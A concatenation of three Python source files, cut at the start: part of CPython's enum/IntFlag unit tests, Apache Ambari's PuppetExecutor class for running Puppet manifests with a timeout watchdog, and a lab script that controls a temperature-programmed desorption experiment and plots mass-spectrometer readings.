self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(Perm(8)), 'Perm.8')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.-8')
self.assertEqual(str(~(Perm.R | 8)), 'Perm.W|X')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
self.assertEqual(str(Perm(~8)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(Open(4)), 'Open.4')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC|RW|WO')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(str(Open(~4)), 'Open.CE|AC|RW|WO')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm.R | 8), '<Perm.8|R: 12>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(8)), '<Perm.8: 8>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: -5>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: -3>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: -2>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: -7>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.-8: -8>')
self.assertEqual(repr(~(Perm.R | 8)), '<Perm.W|X: -13>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: -1>')
self.assertEqual(repr(Perm(~8)), '<Perm.R|W|X: -9>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(Open(4)), '<Open.4: 4>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: -1>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: -2>')
self.assertEqual(repr(~Open.AC), '<Open.CE: -4>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC|RW|WO: -524289>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: -524290>')
self.assertEqual(repr(Open(~4)), '<Open.CE|AC|RW|WO: -5>')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, ~i.value)
self.assertEqual((~i).value, ~i.value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_programatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
'GREEN' in Color
with self.assertRaises(TypeError):
'RW' in Open
with self.assertRaises(TypeError):
2 in Color
with self.assertRaises(TypeError):
2 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@support.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with support.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestUnique(unittest.TestCase):
def test_unique_clean(self):
@unique
class Clean(Enum):
one = 1
two = 'dos'
tres = 4.0
@unique
class Cleaner(IntEnum):
single = 1
double = 2
triple = 3
def test_unique_dirty(self):
with self.assertRaisesRegex(ValueError, 'tres.*one'):
@unique
class Dirty(Enum):
one = 1
two = 'dos'
tres = 1
with self.assertRaisesRegex(
ValueError,
'double.*single.*turkey.*triple',
):
@unique
class Dirtier(IntEnum):
single = 1
double = 1
triple = 3
turkey = 3
def test_unique_with_name(self):
@unique
class Silly(Enum):
one = 1
two = 'dos'
name = 3
@unique
class Sillier(IntEnum):
single = 1
name = 2
triple = 3
value = 4
expected_help_output_with_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| An enumeration.
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
| The name of the Enum member.
|\x20\x20
| value
| The value of the Enum member.
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|\x20\x20
| __members__
| Returns a mapping of member name->value.
|\x20\x20\x20\x20\x20\x20
| This mapping lists all enum members, including aliases. Note that this
| is a read-only view of the internal mapping."""
expected_help_output_without_docs = """\
Help on class Color in module %s:
class Color(enum.Enum)
| Color(value, names=None, *, module=None, qualname=None, type=None, start=1)
|\x20\x20
| Method resolution order:
| Color
| enum.Enum
| builtins.object
|\x20\x20
| Data and other attributes defined here:
|\x20\x20
| blue = <Color.blue: 3>
|\x20\x20
| green = <Color.green: 2>
|\x20\x20
| red = <Color.red: 1>
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.Enum:
|\x20\x20
| name
|\x20\x20
| value
|\x20\x20
| ----------------------------------------------------------------------
| Data descriptors inherited from enum.EnumMeta:
|\x20\x20
| __members__"""
class TestStdLib(unittest.TestCase):
maxDiff = None
class Color(Enum):
red = 1
green = 2
blue = 3
def test_pydoc(self):
# indirectly test __objclass__
if StrEnum.__doc__ is None:
expected_text = expected_help_output_without_docs % __name__
else:
expected_text = expected_help_output_with_docs % __name__
output = StringIO()
helper = pydoc.Helper(output=output)
helper(self.Color)
result = output.getvalue().strip()
self.assertEqual(result, expected_text)
def test_inspect_getmembers(self):
values = dict((
('__class__', EnumMeta),
('__doc__', 'An enumeration.'),
('__members__', self.Color.__members__),
('__module__', __name__),
('blue', self.Color.blue),
('green', self.Color.green),
('name', Enum.__dict__['name']),
('red', self.Color.red),
('value', Enum.__dict__['value']),
))
result = dict(inspect.getmembers(self.Color))
self.assertEqual(values.keys(), result.keys())
failed = False
for k in values.keys():
if result[k] != values[k]:
print()
print('\n%s\n key: %s\n result: %s\nexpected: %s\n%s\n' %
('=' * 75, k, result[k], values[k], '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
def test_inspect_classify_class_attrs(self):
# indirectly test __objclass__
from inspect import Attribute
values = [
Attribute(name='__class__', kind='data',
defining_class=object, object=EnumMeta),
Attribute(name='__doc__', kind='data',
defining_class=self.Color, object='An enumeration.'),
Attribute(name='__members__', kind='property',
defining_class=EnumMeta, object=EnumMeta.__members__),
Attribute(name='__module__', kind='data',
defining_class=self.Color, object=__name__),
Attribute(name='blue', kind='data',
defining_class=self.Color, object=self.Color.blue),
Attribute(name='green', kind='data',
defining_class=self.Color, object=self.Color.green),
Attribute(name='red', kind='data',
defining_class=self.Color, object=self.Color.red),
Attribute(name='name', kind='data',
defining_class=Enum, object=Enum.__dict__['name']),
Attribute(name='value', kind='data',
defining_class=Enum, object=Enum.__dict__['value']),
]
values.sort(key=lambda item: item.name)
result = list(inspect.classify_class_attrs(self.Color))
result.sort(key=lambda item: item.name)
failed = False
for v, r in zip(values, result):
if r != v:
print('\n%s\n%s\n%s\n%s\n' % ('=' * 75, r, v, '=' * 75), sep='')
failed = True
if failed:
self.fail("result does not equal expected, see print above")
class MiscTestCase(unittest.TestCase):
def test__all__(self):
support.check__all__(self, enum)
# These are unordered here on purpose to ensure that declaration order
# makes no difference.
CONVERT_TEST_NAME_D = 5
CONVERT_TEST_NAME_C = 5
CONVERT_TEST_NAME_B = 5
CONVERT_TEST_NAME_A = 5 # This one should sort first.
CONVERT_TEST_NAME_E = 5
CONVERT_TEST_NAME_F = 5
class TestIntEnumConvert(unittest.TestCase):
def test_convert_value_lookup_priority(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# We don't want the reverse lookup value to vary when there are
# multiple possible names for a given value. It should always
# report the first lexigraphical name in that case.
self.assertEqual(test_type(5).name, 'CONVERT_TEST_NAME_A')
def test_convert(self):
test_type = enum.IntEnum._convert_(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
# Ensure that test_type has all of the desired names and values.
self.assertEqual(test_type.CONVERT_TEST_NAME_F,
test_type.CONVERT_TEST_NAME_A)
self.assertEqual(test_type.CONVERT_TEST_NAME_B, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_C, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_D, 5)
self.assertEqual(test_type.CONVERT_TEST_NAME_E, 5)
# Ensure that test_type only picked up names matching the filter.
self.assertEqual([name for name in dir(test_type)
if name[0:2] not in ('CO', '__')],
[], msg='Names other than CONVERT_TEST_* found.')
@unittest.skipUnless(sys.version_info[:2] == (3, 8),
'_convert was deprecated in 3.8')
def test_convert_warn(self):
with self.assertWarns(DeprecationWarning):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
@unittest.skipUnless(sys.version_info >= (3, 9),
'_convert was removed in 3.9')
def test_convert_raise(self):
with self.assertRaises(AttributeError):
enum.IntEnum._convert(
'UnittestConvert',
('test.test_enum', '__main__')[__name__=='__main__'],
filter=lambda x: x.startswith('CONVERT_TEST_'))
if __name__ == '__main__':
unittest.main()
|
PuppetExecutor.py
|
#!/usr/bin/env python2.6
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import json
import os.path
import logging
import subprocess
import pprint
import threading
from threading import Thread
from manifestGenerator import generateManifest
from RepoInstaller import RepoInstaller
from Grep import Grep
import shell
logger = logging.getLogger()
class PuppetExecutor:
""" Class that executes the commands that come from the server using puppet.
This is the class that provides the pluggable point for executing the puppet"""
# How many seconds will pass before running puppet is terminated on timeout
PUPPET_TIMEOUT_SECONDS = 600
grep = Grep()
event = threading.Event()
last_puppet_has_been_killed = False
NO_ERROR = "none"
def __init__(self, puppetModule, puppetInstall, facterInstall, tmpDir, config):
self.puppetModule = puppetModule
self.puppetInstall = puppetInstall
self.facterInstall = facterInstall
self.tmpDir = tmpDir
self.reposInstalled = False
self.config = config
self.modulesdir = self.puppetModule + "/modules"
def configureEnviron(self, environ):
if not self.config.has_option("puppet", "ruby_home"):
return environ
ruby_home = self.config.get("puppet", "ruby_home")
if os.path.exists(ruby_home):
"""Only update ruby home if the config is configured"""
path = os.environ["PATH"]
if not ruby_home in path:
environ["PATH"] = ruby_home + os.path.sep + "bin" + ":"+environ["PATH"]
environ["MY_RUBY_HOME"] = ruby_home
return environ
def getPuppetBinary(self):
puppetbin = os.path.join(self.puppetInstall, "bin", "puppet")
if os.path.exists(puppetbin):
return puppetbin
else:
logger.info("Using default puppet on the host : " + puppetbin
+ " does not exist.")
return "puppet"
def discardInstalledRepos(self):
"""
Makes agent to forget about installed repos.
So the next call of generate_repo_manifests() will definitely
install repos again
"""
self.reposInstalled = False
def generate_repo_manifests(self, command, tmpDir, modulesdir, taskId):
# Hack to only create the repo files once
manifest_list = []
if not self.reposInstalled:
repoInstaller = RepoInstaller(command, tmpDir, modulesdir, taskId, self.config)
manifest_list = repoInstaller.generate_repo_manifests()
return manifest_list
def puppetCommand(self, sitepp):
modules = self.puppetModule
puppetcommand = [self.getPuppetBinary(), "apply", "--confdir=" + modules, "--detailed-exitcodes", sitepp]
return puppetcommand
def facterLib(self):
return self.facterInstall + "/lib/"
pass
def puppetLib(self):
return self.puppetInstall + "/lib"
pass
def condenseOutput(self, stdout, stderr, retcode):
grep = self.grep
if stderr == self.NO_ERROR:
result = grep.tail(stdout, grep.OUTPUT_LAST_LINES)
else:
result = grep.grep(stdout, "fail", grep.ERROR_LAST_LINES_BEFORE, grep.ERROR_LAST_LINES_AFTER)
if result is None: # Second try
result = grep.grep(stdout, "err", grep.ERROR_LAST_LINES_BEFORE, grep.ERROR_LAST_LINES_AFTER)
filteredresult = grep.filterMarkup(result)
return filteredresult
def isSuccessfull(self, returncode):
return not self.last_puppet_has_been_killed and (returncode == 0 or returncode == 2)
def run_manifest(self, command, file, tmpoutfile, tmperrfile):
result = {}
taskId = 0
if command.has_key("taskId"):
taskId = command['taskId']
puppetEnv = os.environ
#Install repos
repo_manifest_list = self.generate_repo_manifests(command, self.tmpDir, self.modulesdir, taskId)
puppetFiles = list(repo_manifest_list)
puppetFiles.append(file)
#Run all puppet commands, from manifest generator and for repos installation
#Appending outputs and errors, exitcode - maximal from all
for puppetFile in puppetFiles:
self.runPuppetFile(puppetFile, result, puppetEnv, tmpoutfile, tmperrfile)
# Check if one of the puppet command fails and error out
if not self.isSuccessfull(result["exitcode"]):
break
if self.isSuccessfull(result["exitcode"]):
# Check if all the repos were installed or not and reset the flag
self.reposInstalled = True
logger.info("ExitCode : " + str(result["exitcode"]))
return result
def runCommand(self, command, tmpoutfile, tmperrfile):
taskId = 0
if command.has_key("taskId"):
taskId = command['taskId']
siteppFileName = os.path.join(self.tmpDir, "site-" + str(taskId) + ".pp")
generateManifest(command, siteppFileName, self.modulesdir, self.config)
result = self.run_manifest(command, siteppFileName, tmpoutfile, tmperrfile)
return result
def runPuppetFile(self, puppetFile, result, puppetEnv, tmpoutfile, tmperrfile):
""" Run the command and make sure the output gets propagated"""
puppetcommand = self.puppetCommand(puppetFile)
rubyLib = ""
if os.environ.has_key("RUBYLIB"):
rubyLib = os.environ["RUBYLIB"]
logger.debug("RUBYLIB from Env " + rubyLib)
if not (self.facterLib() in rubyLib):
rubyLib = rubyLib + ":" + self.facterLib()
if not (self.puppetLib() in rubyLib):
rubyLib = rubyLib + ":" + self.puppetLib()
tmpout = open(tmpoutfile, 'w')
tmperr = open(tmperrfile, 'w')
puppetEnv["RUBYLIB"] = rubyLib
puppetEnv = self.configureEnviron(puppetEnv)
logger.debug("Setting RUBYLIB as: " + rubyLib)
logger.info("Running command " + pprint.pformat(puppetcommand))
puppet = self.lauch_puppet_subprocess(puppetcommand, tmpout, tmperr, puppetEnv)
logger.debug("Launching watchdog thread")
self.event.clear()
self.last_puppet_has_been_killed = False
thread = Thread(target = self.puppet_watchdog_func, args = (puppet, ))
thread.start()
# Waiting for process to finished or killed
puppet.communicate()
self.event.set()
thread.join()
# Building results
error = self.NO_ERROR
returncode = 0
if not self.isSuccessfull(puppet.returncode):
returncode = puppet.returncode
error = open(tmperrfile, 'r').read()
logging.error("Error running puppet: \n" + str(error))
pass
if self.last_puppet_has_been_killed:
error = str(error) + "\n Puppet has been killed due to timeout"
returncode = 999
if result.has_key("stderr"):
result["stderr"] = result["stderr"] + os.linesep + str(error)
else:
result["stderr"] = str(error)
puppetOutput = open(tmpoutfile, 'r').read()
logger.debug("Output from puppet :\n" + puppetOutput)
logger.info("Puppet exit code is " + str(returncode))
if result.has_key("exitcode"):
result["exitcode"] = max(returncode, result["exitcode"])
else:
result["exitcode"] = returncode
condensed = self.condenseOutput(puppetOutput, error, returncode)
if result.has_key("stdout"):
result["stdout"] = result["stdout"] + os.linesep + str(condensed)
else:
result["stdout"] = str(condensed)
return result
def lauch_puppet_subprocess(self, puppetcommand, tmpout, tmperr, puppetEnv):
"""
Creates subprocess with given parameters. This functionality was moved to separate method
to make possible unit testing
"""
return subprocess.Popen(puppetcommand,
stdout=tmpout,
stderr=tmperr,
env=puppetEnv)
def puppet_watchdog_func(self, puppet):
self.event.wait(self.PUPPET_TIMEOUT_SECONDS)
if puppet.returncode is None:
logger.error("Task timed out and will be killed")
shell.kill_process_with_children(puppet.pid)
self.last_puppet_has_been_killed = True
pass
def main():
logging.basicConfig(level=logging.DEBUG)
#test code
jsonFile = open('test.json', 'r')
jsonStr = jsonFile.read()
# Below is for testing only.
puppetInstance = PuppetExecutor("/home/centos/ambari_repo_info/ambari-agent/src/main/puppet/",
"/usr/",
"/root/workspace/puppet-install/facter-1.6.10/",
"/tmp")
jsonFile = open('test.json', 'r')
jsonStr = jsonFile.read()
parsedJson = json.loads(jsonStr)
result = puppetInstance.runCommand(parsedJson, '/tmp/out.txt', '/tmp/err.txt')
logger.debug(result)
if __name__ == '__main__':
main()
|
Run.py
|
"""
"""
import time
import numpy as np
from threading import Thread
from TPD.MassSpec_Functions import thread_read_masses
from TPD.Eurotherm_Functions import thread_send_mV_setpoint,read_Temp_value
# from TPD.Gui import emergency_stop
from TPD.Header_info import write_data, header_info
import pyqtgraph as pg
from queue import Queue
import sys
import os
from PyQt5.QtWidgets import QMainWindow, QPushButton, QApplication
from pyqtgraph.Qt import QtCore, QtGui
def runme(iter_freq, mv_setpoints, time_array,list_of_masses, list_of_sensitivities, sendFreq, alpha, alpha_iter,
n, temp_plot_arr, T_array, mass_signals, setpoint_sending, temp_setpoints, curves, T_set_curve, T_read_curve,
controlObj, controlObj2, uti1, app, win1, win2, button, button_hold, button_hold_off, stop_button, hold_button, hold_off_button, save_path,
project_folder, experiment_name, hold_time=30):
def emergency_stop():
# stop increasing the temp and send a safe setpoint
# controlObj.write_sp(0.0)
# TODO add save data
# from TPD.Main import cum_time, T_array, mass_signals
controlObj.write_sp(-2.9)
controlObj.close_me()
controlObj2.close_me()
time.sleep(1)
# quit()
os.chdir(save_path)
os.makedirs(project_folder, exist_ok=True)
write_data(project_folder, experiment_name, cum_time, T_array, mass_signals)
sys.exit()
def hold_off():
time.sleep(hold_time)
controlObj.write_sp(-2.9)
controlObj.close_me()
controlObj2.close_me()
time.sleep(1)
# quit()
os.chdir(save_path)
os.makedirs(project_folder, exist_ok=True)
write_data(project_folder, experiment_name, cum_time, T_array, mass_signals)
sys.exit()
def hold_temperature():
time.sleep(hold_time)
button.clicked.connect(emergency_stop)
button_hold.clicked.connect(hold_temperature)
button_hold_off.clicked.connect(hold_off)
cum_time = 0
# proxy = QtGui.QGraphicsProxyWidget()
# button = QtGui.QPushButton('STOP')
# proxy.setWidget(button)
# stop_button = win2.addItem(proxy)
# button.clicked.connect(emergency_stop(controlObj))
queue = Queue()
# while iter_freq < len(mv_setpoints):
while alpha_iter < len(setpoint_sending):
start_alpha = time.time()
# append current time to the array.
time_array = np.append(time_array, time.time())
# Read time and temperature data
cum_time = np.cumsum(np.concatenate(([0], np.diff(time_array))))
t = Thread(target=thread_read_masses, args=(uti1, list_of_masses, list_of_sensitivities, queue))
# t = Thread(target=thread_read_masses, args=(list_of_masses, list_of_sensitivities, mass_signals))
# cProfile.run('t.start()')
t.start()
# t = cProfile.run('thread_profile(list_of_masses, list_of_sensitivities, queue)')
# print(setpoint_sending[alpha_iter])
iter_freq = thread_send_mV_setpoint(iter_freq, mv_setpoints, setpoint_sending[alpha_iter], sendFreq, alpha,
controlObj, t)
t.join()
response = queue.get()
# print(alpha_iter)
alpha_iter += 1
try:
# controlObj.write_sp(mv_setpoints[iter_freq])
if alpha_iter*n <= len(temp_setpoints) and alpha_iter != 0:
# temp_plot_arr = np.append(temp_plot_arr, temp_setpoints[multiple*i])
temp_plot_arr = np.append(temp_plot_arr, temp_setpoints[iter_freq])
else:
temp_plot_arr = np.append(temp_plot_arr, temp_setpoints[0])
except IndexError as e:
print(e)
controlObj.write_sp(mv_setpoints[0])
try:
T_set_curve.setData(x=cum_time[:len(temp_plot_arr)], y=temp_plot_arr, pen='r', name='setpoint')
except:
T_set_curve.setData(x=cum_time, y=temp_plot_arr[:len(cum_time)], pen='r', name='setpoint')
# TODO read_Temp_value is a duplicate of Eurotherm.read_temp() fcn
T_array = np.append(T_array, read_Temp_value(controlObj, controlObj2))
T_read_curve.setData(x=cum_time, y=T_array, pen='g', name='readout')
# TODO add masses
if len(list_of_masses) > 0 and not None:
for i, j, k in zip(response, list_of_masses, curves):
mass_signals['mass' + str(j)] = np.append(mass_signals['mass' + str(j)], i)
if alpha_iter % 4 == 0:
k.setData(x=T_array, y=mass_signals['mass{0}'.format(str(j))], pen='g')
# pg.QtGui.QApplication.processEvents()
# for mass, mass_plot in zip(list_of_masses, curves):
# mass_plot.setData(x=T_array, y=mass_signals['mass{0}'.format(mass)], pen='g')
# T_set_curve.setData(x=cum_time,y=temp_plot_arr[:len(cum_time)], pen='r',name='setpoint')
